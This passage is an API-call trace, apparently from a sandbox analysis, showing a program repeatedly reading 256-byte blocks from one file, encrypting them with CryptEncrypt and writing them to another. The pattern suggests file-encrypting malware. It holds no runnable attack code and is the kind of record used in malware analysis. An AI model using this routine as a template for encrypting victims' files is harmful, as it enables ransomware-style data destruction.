[0167.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.504] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.504] GetLastError () returned 0x0 [0167.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.504] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.504] GetLastError () returned 0x0 [0167.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.504] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.504] GetLastError () returned 0x0 [0167.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.504] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.504] GetLastError () returned 0x0 [0167.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.504] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.505] GetLastError () returned 0x0 [0167.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.505] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.505] GetLastError () returned 0x0 [0167.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.505] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.505] GetLastError () returned 0x0 [0167.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.505] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.505] GetLastError () returned 0x0 [0167.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.505] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.505] GetLastError () returned 0x0 [0167.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.505] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.505] GetLastError () returned 0x0 [0167.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.505] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.505] GetLastError () returned 0x0 [0167.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.506] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.506] GetLastError () returned 0x0 [0167.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.506] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.506] GetLastError () returned 0x0 [0167.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.506] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.506] GetLastError () returned 0x0 [0167.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.506] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.506] GetLastError () returned 0x0 [0167.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.506] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.506] GetLastError () returned 0x0 [0167.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.506] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.506] GetLastError () returned 0x0 [0167.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.506] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.507] GetLastError () returned 0x0 [0167.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.507] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.507] GetLastError () returned 0x0 [0167.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.507] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.507] GetLastError () returned 0x0 [0167.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.507] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.507] GetLastError () returned 0x0 [0167.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.507] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.507] GetLastError () returned 0x0 [0167.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.507] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.507] GetLastError () returned 0x0 [0167.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.508] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.508] GetLastError () returned 0x0 [0167.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.508] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.508] GetLastError () returned 0x0 [0167.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.508] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.508] GetLastError () returned 0x0 [0167.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.508] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.508] GetLastError () returned 0x0 [0167.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.508] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.508] GetLastError () returned 0x0 [0167.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.509] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.509] GetLastError () returned 0x0 [0167.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.509] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.509] GetLastError () returned 0x0 [0167.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.509] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.509] GetLastError () returned 0x0 [0167.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.509] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.509] GetLastError () returned 0x0 [0167.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 